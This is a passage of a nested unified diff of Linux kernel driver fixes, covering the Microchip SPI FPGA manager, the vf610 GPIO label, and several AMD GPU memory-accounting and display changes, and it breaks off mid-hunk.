+diff --git a/drivers/fpga/microchip-spi.c b/drivers/fpga/microchip-spi.c
+index 7436976ea9048..137fafdf57a6f 100644
+--- a/drivers/fpga/microchip-spi.c
++++ b/drivers/fpga/microchip-spi.c
+@@ -6,6 +6,7 @@
+ #include <asm/unaligned.h>
+ #include <linux/delay.h>
+ #include <linux/fpga/fpga-mgr.h>
++#include <linux/iopoll.h>
+ #include <linux/module.h>
+ #include <linux/of_device.h>
+ #include <linux/spi/spi.h>
+@@ -33,7 +34,7 @@
+ 
+ #define	MPF_BITS_PER_COMPONENT_SIZE	22
+ 
+-#define	MPF_STATUS_POLL_RETRIES		10000
++#define	MPF_STATUS_POLL_TIMEOUT		(2 * USEC_PER_SEC)
+ #define	MPF_STATUS_BUSY			BIT(0)
+ #define	MPF_STATUS_READY		BIT(1)
+ #define	MPF_STATUS_SPI_VIOLATION	BIT(2)
+@@ -42,46 +43,55 @@
+ struct mpf_priv {
+ 	struct spi_device *spi;
+ 	bool program_mode;
++	u8 tx __aligned(ARCH_KMALLOC_MINALIGN);
++	u8 rx;
+ };
+ 
+-static int mpf_read_status(struct spi_device *spi)
++static int mpf_read_status(struct mpf_priv *priv)
+ {
+-	u8 status = 0, status_command = MPF_SPI_READ_STATUS;
+-	struct spi_transfer xfers[2] = { 0 };
+-	int ret;
+-
+ 	/*
+ 	 * HW status is returned on MISO in the first byte after CS went
+ 	 * active. However, first reading can be inadequate, so we submit
+ 	 * two identical SPI transfers and use result of the later one.
+ 	 */
+-	xfers[0].tx_buf = &status_command;
+-	xfers[1].tx_buf = &status_command;
+-	xfers[0].rx_buf = &status;
+-	xfers[1].rx_buf = &status;
+-	xfers[0].len = 1;
+-	xfers[1].len = 1;
+-	xfers[0].cs_change = 1;
++	struct spi_transfer xfers[2] = {
++		{
++			.tx_buf = &priv->tx,
++			.rx_buf = &priv->rx,
++			.len = 1,
++			.cs_change = 1,
++		}, {
++			.tx_buf = &priv->tx,
++			.rx_buf = &priv->rx,
++			.len = 1,
++		},
++	};
++	u8 status;
++	int ret;
+ 
+-	ret = spi_sync_transfer(spi, xfers, 2);
++	priv->tx = MPF_SPI_READ_STATUS;
++
++	ret = spi_sync_transfer(priv->spi, xfers, 2);
++	if (ret)
++		return ret;
++
++	status = priv->rx;
+ 
+ 	if ((status & MPF_STATUS_SPI_VIOLATION) ||
+ 	    (status & MPF_STATUS_SPI_ERROR))
+-		ret = -EIO;
++		return -EIO;
+ 
+-	return ret ? : status;
++	return status;
+ }
+ 
+ static enum fpga_mgr_states mpf_ops_state(struct fpga_manager *mgr)
+ {
+ 	struct mpf_priv *priv = mgr->priv;
+-	struct spi_device *spi;
+ 	bool program_mode;
+ 	int status;
+ 
+-	spi = priv->spi;
+ 	program_mode = priv->program_mode;
+-	status = mpf_read_status(spi);
++	status = mpf_read_status(priv);
+ 
+ 	if (!program_mode && !status)
+ 		return FPGA_MGR_STATE_OPERATING;
+@@ -185,52 +195,53 @@ static int mpf_ops_parse_header(struct fpga_manager *mgr,
+ 	return 0;
+ }
+ 
+-/* Poll HW status until busy bit is cleared and mask bits are set. */
+-static int mpf_poll_status(struct spi_device *spi, u8 mask)
++static int mpf_poll_status(struct mpf_priv *priv, u8 mask)
+ {
+-	int status, retries = MPF_STATUS_POLL_RETRIES;
++	int ret, status;
+ 
+-	while (retries--) {
+-		status = mpf_read_status(spi);
+-		if (status < 0)
+-			return status;
+-
+-		if (status & MPF_STATUS_BUSY)
+-			continue;
+-
+-		if (!mask || (status & mask))
+-			return status;
+-	}
++	/*
++	 * Busy poll HW status. Polling stops if any of the following
++	 * conditions are met:
++	 *  - timeout is reached
++	 *  - mpf_read_status() returns an error
++	 *  - busy bit is cleared AND mask bits are set
++	 */
++	ret = read_poll_timeout(mpf_read_status, status,
++				(status < 0) ||
++				((status & (MPF_STATUS_BUSY | mask)) == mask),
++				0, MPF_STATUS_POLL_TIMEOUT, false, priv);
++	if (ret < 0)
++		return ret;
+ 
+-	return -EBUSY;
++	return status;
+ }
+ 
+-static int mpf_spi_write(struct spi_device *spi, const void *buf, size_t buf_size)
++static int mpf_spi_write(struct mpf_priv *priv, const void *buf, size_t buf_size)
+ {
+-	int status = mpf_poll_status(spi, 0);
++	int status = mpf_poll_status(priv, 0);
+ 
+ 	if (status < 0)
+ 		return status;
+ 
+-	return spi_write(spi, buf, buf_size);
++	return spi_write_then_read(priv->spi, buf, buf_size, NULL, 0);
+ }
+ 
+-static int mpf_spi_write_then_read(struct spi_device *spi,
++static int mpf_spi_write_then_read(struct mpf_priv *priv,
+ 				   const void *txbuf, size_t txbuf_size,
+ 				   void *rxbuf, size_t rxbuf_size)
+ {
+ 	const u8 read_command[] = { MPF_SPI_READ_DATA };
+ 	int ret;
+ 
+-	ret = mpf_spi_write(spi, txbuf, txbuf_size);
++	ret = mpf_spi_write(priv, txbuf, txbuf_size);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = mpf_poll_status(spi, MPF_STATUS_READY);
++	ret = mpf_poll_status(priv, MPF_STATUS_READY);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	return spi_write_then_read(spi, read_command, sizeof(read_command),
++	return spi_write_then_read(priv->spi, read_command, sizeof(read_command),
+ 				   rxbuf, rxbuf_size);
+ }
+ 
+@@ -242,7 +253,6 @@ static int mpf_ops_write_init(struct fpga_manager *mgr,
+ 	const u8 isc_en_command[] = { MPF_SPI_ISC_ENABLE };
+ 	struct mpf_priv *priv = mgr->priv;
+ 	struct device *dev = &mgr->dev;
+-	struct spi_device *spi;
+ 	u32 isc_ret = 0;
+ 	int ret;
+ 
+@@ -251,9 +261,7 @@ static int mpf_ops_write_init(struct fpga_manager *mgr,
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	spi = priv->spi;
+-
+-	ret = mpf_spi_write_then_read(spi, isc_en_command, sizeof(isc_en_command),
++	ret = mpf_spi_write_then_read(priv, isc_en_command, sizeof(isc_en_command),
+ 				      &isc_ret, sizeof(isc_ret));
+ 	if (ret || isc_ret) {
+ 		dev_err(dev, "Failed to enable ISC: spi_ret %d, isc_ret %u\n",
+@@ -261,7 +269,7 @@ static int mpf_ops_write_init(struct fpga_manager *mgr,
+ 		return -EFAULT;
+ 	}
+ 
+-	ret = mpf_spi_write(spi, program_mode, sizeof(program_mode));
++	ret = mpf_spi_write(priv, program_mode, sizeof(program_mode));
+ 	if (ret) {
+ 		dev_err(dev, "Failed to enter program mode: %d\n", ret);
+ 		return ret;
+@@ -274,11 +282,9 @@ static int mpf_ops_write_init(struct fpga_manager *mgr,
+ 
+ static int mpf_ops_write(struct fpga_manager *mgr, const char *buf, size_t count)
+ {
+-	u8 spi_frame_command[] = { MPF_SPI_FRAME };
+ 	struct spi_transfer xfers[2] = { 0 };
+ 	struct mpf_priv *priv = mgr->priv;
+ 	struct device *dev = &mgr->dev;
+-	struct spi_device *spi;
+ 	int ret, i;
+ 
+ 	if (count % MPF_SPI_FRAME_SIZE) {
+@@ -287,18 +293,18 @@ static int mpf_ops_write(struct fpga_manager *mgr, const char *buf, size_t count
+ 		return -EINVAL;
+ 	}
+ 
+-	spi = priv->spi;
+-
+-	xfers[0].tx_buf = spi_frame_command;
+-	xfers[0].len = sizeof(spi_frame_command);
++	xfers[0].tx_buf = &priv->tx;
++	xfers[0].len = 1;
+ 
+ 	for (i = 0; i < count / MPF_SPI_FRAME_SIZE; i++) {
+ 		xfers[1].tx_buf = buf + i * MPF_SPI_FRAME_SIZE;
+ 		xfers[1].len = MPF_SPI_FRAME_SIZE;
+ 
+-		ret = mpf_poll_status(spi, 0);
+-		if (ret >= 0)
+-			ret = spi_sync_transfer(spi, xfers, ARRAY_SIZE(xfers));
++		ret = mpf_poll_status(priv, 0);
++		if (ret >= 0) {
++			priv->tx = MPF_SPI_FRAME;
++			ret = spi_sync_transfer(priv->spi, xfers, ARRAY_SIZE(xfers));
++		}
+ 
+ 		if (ret) {
+ 			dev_err(dev, "Failed to write bitstream frame %d/%zu\n",
+@@ -317,12 +323,9 @@ static int mpf_ops_write_complete(struct fpga_manager *mgr,
+ 	const u8 release_command[] = { MPF_SPI_RELEASE };
+ 	struct mpf_priv *priv = mgr->priv;
+ 	struct device *dev = &mgr->dev;
+-	struct spi_device *spi;
+ 	int ret;
+ 
+-	spi = priv->spi;
+-
+-	ret = mpf_spi_write(spi, isc_dis_command, sizeof(isc_dis_command));
++	ret = mpf_spi_write(priv, isc_dis_command, sizeof(isc_dis_command));
+ 	if (ret) {
+ 		dev_err(dev, "Failed to disable ISC: %d\n", ret);
+ 		return ret;
+@@ -330,7 +333,7 @@ static int mpf_ops_write_complete(struct fpga_manager *mgr,
+ 
+ 	usleep_range(1000, 2000);
+ 
+-	ret = mpf_spi_write(spi, release_command, sizeof(release_command));
++	ret = mpf_spi_write(priv, release_command, sizeof(release_command));
+ 	if (ret) {
+ 		dev_err(dev, "Failed to exit program mode: %d\n", ret);
+ 		return ret;
+diff --git a/drivers/gpio/gpio-vf610.c b/drivers/gpio/gpio-vf610.c
+index 9db42f6a20439..a429176673e7a 100644
+--- a/drivers/gpio/gpio-vf610.c
++++ b/drivers/gpio/gpio-vf610.c
+@@ -304,7 +304,7 @@ static int vf610_gpio_probe(struct platform_device *pdev)
+ 
+ 	gc = &port->gc;
+ 	gc->parent = dev;
+-	gc->label = "vf610-gpio";
++	gc->label = dev_name(dev);
+ 	gc->ngpio = VF610_GPIO_PER_PORT;
+ 	gc->base = of_alias_get_id(np, "gpio") * VF610_GPIO_PER_PORT;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
+index 30f145dc8724e..dbc842590b253 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
+@@ -95,7 +95,7 @@ struct amdgpu_amdkfd_fence {
+ 
+ struct amdgpu_kfd_dev {
+ 	struct kfd_dev *dev;
+-	uint64_t vram_used;
++	int64_t vram_used;
+ 	uint64_t vram_used_aligned;
+ 	bool init_complete;
+ 	struct work_struct reset_work;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+index 404c839683b1c..da01c1424b4ad 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+@@ -1653,6 +1653,7 @@ int amdgpu_amdkfd_gpuvm_alloc_memory_of_gpu(
+ 	struct amdgpu_bo *bo;
+ 	struct drm_gem_object *gobj = NULL;
+ 	u32 domain, alloc_domain;
++	uint64_t aligned_size;
+ 	u64 alloc_flags;
+ 	int ret;
+ 
+@@ -1703,22 +1704,23 @@ int amdgpu_amdkfd_gpuvm_alloc_memory_of_gpu(
+ 	 * the memory.
+ 	 */
+ 	if ((*mem)->aql_queue)
+-		size = size >> 1;
++		size >>= 1;
++	aligned_size = PAGE_ALIGN(size);
+ 
+ 	(*mem)->alloc_flags = flags;
+ 
+ 	amdgpu_sync_create(&(*mem)->sync);
+ 
+-	ret = amdgpu_amdkfd_reserve_mem_limit(adev, size, flags);
++	ret = amdgpu_amdkfd_reserve_mem_limit(adev, aligned_size, flags);
+ 	if (ret) {
+ 		pr_debug("Insufficient memory\n");
+ 		goto err_reserve_limit;
+ 	}
+ 
+ 	pr_debug("\tcreate BO VA 0x%llx size 0x%llx domain %s\n",
+-			va, size, domain_string(alloc_domain));
++			va, (*mem)->aql_queue ? size << 1 : size, domain_string(alloc_domain));
+ 
+-	ret = amdgpu_gem_object_create(adev, size, 1, alloc_domain, alloc_flags,
++	ret = amdgpu_gem_object_create(adev, aligned_size, 1, alloc_domain, alloc_flags,
+ 				       bo_type, NULL, &gobj);
+ 	if (ret) {
+ 		pr_debug("Failed to create BO on domain %s. ret %d\n",
+@@ -1775,7 +1777,7 @@ err_node_allow:
+ 	/* Don't unreserve system mem limit twice */
+ 	goto err_reserve_limit;
+ err_bo_create:
+-	amdgpu_amdkfd_unreserve_mem_limit(adev, size, flags);
++	amdgpu_amdkfd_unreserve_mem_limit(adev, aligned_size, flags);
+ err_reserve_limit:
+ 	mutex_destroy(&(*mem)->lock);
+ 	if (gobj)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index a21b3f66fd708..824b0b356b3ce 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -4012,7 +4012,8 @@ void amdgpu_device_fini_hw(struct amdgpu_device *adev)
+ 
+ 	amdgpu_gart_dummy_page_fini(adev);
+ 
+-	amdgpu_device_unmap_mmio(adev);
++	if (drm_dev_is_unplugged(adev_to_drm(adev)))
++		amdgpu_device_unmap_mmio(adev);
+ 
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index 2e5d78b6635c4..dfbeef2c4a9e2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2226,6 +2226,8 @@ amdgpu_pci_remove(struct pci_dev *pdev)
+ 	struct drm_device *dev = pci_get_drvdata(pdev);
+ 	struct amdgpu_device *adev = drm_to_adev(dev);
+ 
++	drm_dev_unplug(dev);
++
+ 	if (adev->pm.rpm_mode != AMDGPU_RUNPM_NONE) {
+ 		pm_runtime_get_sync(dev->dev);
+ 		pm_runtime_forbid(dev->dev);
+@@ -2265,8 +2267,6 @@ amdgpu_pci_remove(struct pci_dev *pdev)
+ 
+ 	amdgpu_driver_unload_kms(dev);
+ 
+-	drm_dev_unplug(dev);
+-
+ 	/*
+ 	 * Flush any in flight DMA operations from device.
+ 	 * Clear the Bus Master Enable bit and then wait on the PCIe Device
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index 712dd72f3ccf2..087147f09933a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -354,7 +354,7 @@ static int psp_init_sriov_microcode(struct psp_context *psp)
+ 		adev->virt.autoload_ucode_id = AMDGPU_UCODE_ID_CP_MES1_DATA;
+ 		break;
+ 	default:
+-		BUG();
++		ret = -EINVAL;
+ 		break;
+ 	}
+ 	return ret;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_trace.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_trace.h
+index 5e6ddc7e101c6..6cd6ea765d37f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_trace.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_trace.h
+@@ -153,10 +153,10 @@ TRACE_EVENT(amdgpu_cs,
+ 
+ 	    TP_fast_assign(
+ 			   __entry->bo_list = p->bo_list;
+-			   __entry->ring = to_amdgpu_ring(job->base.sched)->idx;
++			   __entry->ring = to_amdgpu_ring(job->base.entity->rq->sched)->idx;
+ 			   __entry->dw = ib->length_dw;
+ 			   __entry->fences = amdgpu_fence_count_emitted(
+-				to_amdgpu_ring(job->base.sched));
++				to_amdgpu_ring(job->base.entity->rq->sched));
+ 			   ),
+ 	    TP_printk("bo_list=%p, ring=%u, dw=%u, fences=%u",
+ 		      __entry->bo_list, __entry->ring, __entry->dw,
+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c b/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
+index 31776b12e4c45..4b0d563c6522c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
+@@ -382,6 +382,11 @@ static void nbio_v7_2_init_registers(struct amdgpu_device *adev)
+ 		if (def != data)
+ 			WREG32_PCIE_PORT(SOC15_REG_OFFSET(NBIO, 0, regBIF1_PCIE_MST_CTRL_3), data);
+ 		break;
++	case IP_VERSION(7, 5, 1):
++		data = RREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2);
++		data &= ~RCC_DEV2_EPF0_STRAP2__STRAP_NO_SOFT_RESET_DEV2_F0_MASK;
++		WREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2, data);
++		fallthrough;
+ 	default:
+ 		def = data = RREG32_PCIE_PORT(SOC15_REG_OFFSET(NBIO, 0, regPCIE_CONFIG_CNTL));
+ 		data = REG_SET_FIELD(data, PCIE_CONFIG_CNTL,
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+index 6d291aa6386bd..f79b8e964140e 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+@@ -1127,8 +1127,13 @@ static int kfd_ioctl_alloc_memory_of_gpu(struct file *filep,
+ 	}
+ 
+ 	/* Update the VRAM usage count */
+-	if (flags & KFD_IOC_ALLOC_MEM_FLAGS_VRAM)
+-		WRITE_ONCE(pdd->vram_usage, pdd->vram_usage + args->size);
++	if (flags & KFD_IOC_ALLOC_MEM_FLAGS_VRAM) {
++		uint64_t size = args->size;
++
++		if (flags & KFD_IOC_ALLOC_MEM_FLAGS_AQL_QUEUE_MEM)
++			size >>= 1;
++		WRITE_ONCE(pdd->vram_usage, pdd->vram_usage + PAGE_ALIGN(size));
++	}
+ 
+ 	mutex_unlock(&p->mutex);
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index a930b1873f2a4..050e7a52c8f62 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1240,7 +1240,7 @@ static void mmhub_read_system_context(struct amdgpu_device *adev, struct dc_phy_
+ 	pa_config->gart_config.page_table_end_addr = page_table_end.quad_part << 12;
+ 	pa_config->gart_config.page_table_base_addr = page_table_base.quad_part;
+ 
+-	pa_config->is_hvm_enabled = 0;
++	pa_config->is_hvm_enabled = adev->mode_info.gpu_vm_support;
+ 
+ }
+ 
+@@ -2744,12 +2744,14 @@ static int dm_resume(void *handle)
+ 	drm_for_each_connector_iter(connector, &iter) {
+ 		aconnector = to_amdgpu_dm_connector(connector);
+ 
++		if (!aconnector->dc_link)
++			continue;
++
+ 		/*
+ 		 * this is the case when traversing through already created
+ 		 * MST connectors, should be skipped
+ 		 */
+-		if (aconnector->dc_link &&
+-		    aconnector->dc_link->type == dc_connection_mst_branch)
++		if (aconnector->dc_link->type == dc_connection_mst_branch)
+ 			continue;
+ 
+ 		mutex_lock(&aconnector->hpd_lock);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+index 64dd029702926..b87f50e8fa615 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+@@ -77,6 +77,9 @@ int dm_set_vupdate_irq(struct drm_crtc *crtc, bool enable)
+ 	struct amdgpu_device *adev = drm_to_adev(crtc->dev);
+ 	int rc;
+ 
++	if (acrtc->otg_inst == -1)
++		return 0;
++
+ 	irq_source = IRQ_TYPE_VUPDATE + acrtc->otg_inst;
+ 
+ 	rc = dc_interrupt_set(adev->dm.dc, irq_source, enable) ? 0 : -EBUSY;
+@@ -149,6 +152,9 @@ static inline int dm_set_vblank(struct drm_crtc *crtc, bool enable)
+ 	struct vblank_control_work *work;
+ 	int rc = 0;
+ 
++	if (acrtc->otg_inst == -1)
++		goto skip;
++
+ 	if (enable) {
+ 		/* vblank irq on -> Only need vupdate irq in vrr mode */
+ 		if (amdgpu_dm_vrr_active(acrtc_state))
+@@ -166,6 +172,7 @@ static inline int dm_set_vblank(struct drm_crtc *crtc, bool enable)
+ 	if (!dc_interrupt_set(adev->dm.dc, irq_source, enable))
+ 		return -EBUSY;
+ 
++skip:
+ 	if (amdgpu_in_reset(adev))
+ 		return 0;
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
+index 2db595672a469..aa264c600408d 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
+@@ -146,6 +146,9 @@ static int dcn314_smu_send_msg_with_param(struct clk_mgr_internal *clk_mgr,
+ 		if (msg_id == VBIOSSMC_MSG_TransferTableDram2Smu &&
+ 		    param == TABLE_WATERMARKS)
+ 			DC_LOG_WARNING("Watermarks table not configured properly by SMU");
++		else if (msg_id == VBIOSSMC_MSG_SetHardMinDcfclkByFreq ||
++			 msg_id == VBIOSSMC_MSG_SetMinDeepSleepDcfclk)
++			DC_LOG_WARNING("DCFCLK_DPM is not enabled by BIOS");
+ 		else
+ 			ASSERT(0);
+ 		REG_WRITE(MP1_SMN_C2PMSG_91, VBIOSSMC_Result_OK);
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 5260ad6de8038..af7aefe285ffd 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -878,6 +878,7 @@ static bool dc_construct_ctx(struct dc *dc,
+ 
+ 	dc_ctx->perf_trace = dc_perf_trace_create();
+ 	if (!dc_ctx->perf_trace) {
++		kfree(dc_ctx);
+ 		ASSERT_CRITICAL(false);
+ 		return false;
+ 	}
+@@ -3221,6 +3222,21 @@ static void commit_planes_for_stream(struct dc *dc,
+ 
+ 	dc_z10_restore(dc);
+ 
++	if (update_type == UPDATE_TYPE_FULL) {
++		/* wait for all double-buffer activity to clear on all pipes */
++		int pipe_idx;
++
++		for (pipe_idx = 0; pipe_idx < dc->res_pool->pipe_count; pipe_idx++) {
++			struct pipe_ctx *pipe_ctx = &context->res_ctx.pipe_ctx[pipe_idx];
++
++			if (!pipe_ctx->stream)
++				continue;
++
++			if (pipe_ctx->stream_res.tg->funcs->wait_drr_doublebuffer_pending_clear)
++				pipe_ctx->stream_res.tg->funcs->wait_drr_doublebuffer_pending_clear(pipe_ctx->stream_res.tg);
++		}
++	}
++
+ 	if (get_seamless_boot_stream_count(context) > 0 && surface_count > 0) {
+ 		/* Optimize seamless boot flag keeps clocks and watermarks high until
+ 		 * first flip. After first flip, optimization is required to lower
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index 40b9d2ce08e66..328c5e33cc66b 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -1916,12 +1916,6 @@ struct dc_link *link_create(const struct link_init_data *init_params)
+ 	if (false == dc_link_construct(link, init_params))
+ 		goto construct_fail;
+ 
+-	/*
+-	 * Must use preferred_link_setting, not reported_link_cap or verified_link_cap,
+-	 * since struct preferred_link_setting won't be reset after S3.
+-	 */
+-	link->preferred_link_setting.dpcd_source_device_specific_field_support = true;
+-
+ 	return link;
+ 
+ construct_fail:
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c b/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
+index 1254d38f1778a..24f1aba4ae133 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
+@@ -6591,18 +6591,10 @@ void dpcd_set_source_specific_data(struct dc_link *link)
+ 
+ 			uint8_t hblank_size = (uint8_t)link->dc->caps.min_horizontal_blanking_period;
+ 
+-			if (link->preferred_link_setting.dpcd_source_device_specific_field_support) {
+-				result_write_min_hblank = core_link_write_dpcd(link,
+-					DP_SOURCE_MINIMUM_HBLANK_SUPPORTED, (uint8_t *)(&hblank_size),
+-					sizeof(hblank_size));
+-
+-				if (result_write_min_hblank == DC_ERROR_UNEXPECTED)
+-					link->preferred_link_setting.dpcd_source_device_specific_field_support = false;
+-			} else {
+-				DC_LOG_DC("Sink device does not support 00340h DPCD write. Skipping on purpose.\n");
+-			}
++			result_write_min_hblank = core_link_write_dpcd(link,
++				DP_SOURCE_MINIMUM_HBLANK_SUPPORTED, (uint8_t *)(&hblank_size),
++				sizeof(hblank_size));
+ 		}
+-
+ 		DC_TRACE_LEVEL_MESSAGE(DAL_TRACE_LEVEL_INFORMATION,
+ 							WPP_BIT_FLAG_DC_DETECTION_DP_CAPS,
+ 							"result=%u link_index=%u enum dce_version=%d DPCD=0x%04X min_hblank=%u branch_dev_id=0x%x branch_dev_name='%c%c%c%c%c%c'",
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_dp_types.h b/drivers/gpu/drm/amd/display/dc/dc_dp_types.h
+index 2c54b6e0498bf..296793d8b2bf2 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_dp_types.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_dp_types.h
+@@ -149,7 +149,6 @@ struct dc_link_settings {
+ 	enum dc_link_spread link_spread;
+ 	bool use_link_rate_set;
+ 	uint8_t link_rate_set;
+-	bool dpcd_source_device_specific_field_support;
+ };
+ 
+ union dc_dp_ffe_preset {
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_optc.h b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_optc.h
+index 88ac5f6f4c96c..0b37bb0e184b2 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_optc.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_optc.h
+@@ -519,7 +519,8 @@ struct dcn_optc_registers {
+ 	type OTG_CRC_DATA_STREAM_COMBINE_MODE;\
+ 	type OTG_CRC_DATA_STREAM_SPLIT_MODE;\
+ 	type OTG_CRC_DATA_FORMAT;\
+-	type OTG_V_TOTAL_LAST_USED_BY_DRR;
++	type OTG_V_TOTAL_LAST_USED_BY_DRR;\
++	type OTG_DRR_TIMING_DBUF_UPDATE_PENDING;
+ 
+ #define TG_REG_FIELD_LIST_DCN3_2(type) \
+ 	type OTG_H_TIMING_DIV_MODE_MANUAL;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
+index 892d3c4d01a1e..25749f7d88366 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
+@@ -282,6 +282,14 @@ static void optc3_set_timing_double_buffer(struct timing_generator *optc, bool e
+ 		   OTG_DRR_TIMING_DBUF_UPDATE_MODE, mode);
+ }
+ 
++void optc3_wait_drr_doublebuffer_pending_clear(struct timing_generator *optc)
++{
++	struct optc *optc1 = DCN10TG_FROM_TG(optc);
++
++	REG_WAIT(OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_PENDING, 0, 2, 100000); /* 1 vupdate at 5hz */
++
++}
++
+ void optc3_set_vtotal_min_max(struct timing_generator *optc, int vtotal_min, int vtotal_max)
+ {
+ 	optc1_set_vtotal_min_max(optc, vtotal_min, vtotal_max);
+@@ -351,6 +359,7 @@ static struct timing_generator_funcs dcn30_tg_funcs = {
+ 		.program_manual_trigger = optc2_program_manual_trigger,
+ 		.setup_manual_trigger = optc2_setup_manual_trigger,
+ 		.get_hw_timing = optc1_get_hw_timing,
++		.wait_drr_doublebuffer_pending_clear = optc3_wait_drr_doublebuffer_pending_clear,
+ };
+ 
+ void dcn30_timing_generator_init(struct optc *optc1)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.h b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.h
+index dd45a5499b078..fb06dc9a48937 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.h
+@@ -279,6 +279,7 @@
+ 	SF(OTG0_OTG_DRR_TRIGGER_WINDOW, OTG_DRR_TRIGGER_WINDOW_END_X, mask_sh),\
+ 	SF(OTG0_OTG_DRR_V_TOTAL_CHANGE, OTG_DRR_V_TOTAL_CHANGE_LIMIT, mask_sh),\
+ 	SF(OTG0_OTG_H_TIMING_CNTL, OTG_H_TIMING_DIV_BY2, mask_sh),\
++	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_PENDING, mask_sh),\
+ 	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_MODE, mask_sh),\
+ 	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_BLANK_DATA_DOUBLE_BUFFER_EN, mask_sh)
+ 
+@@ -317,6 +318,7 @@
+ 	SF(OTG0_OTG_DRR_TRIGGER_WINDOW, OTG_DRR_TRIGGER_WINDOW_END_X, mask_sh),\
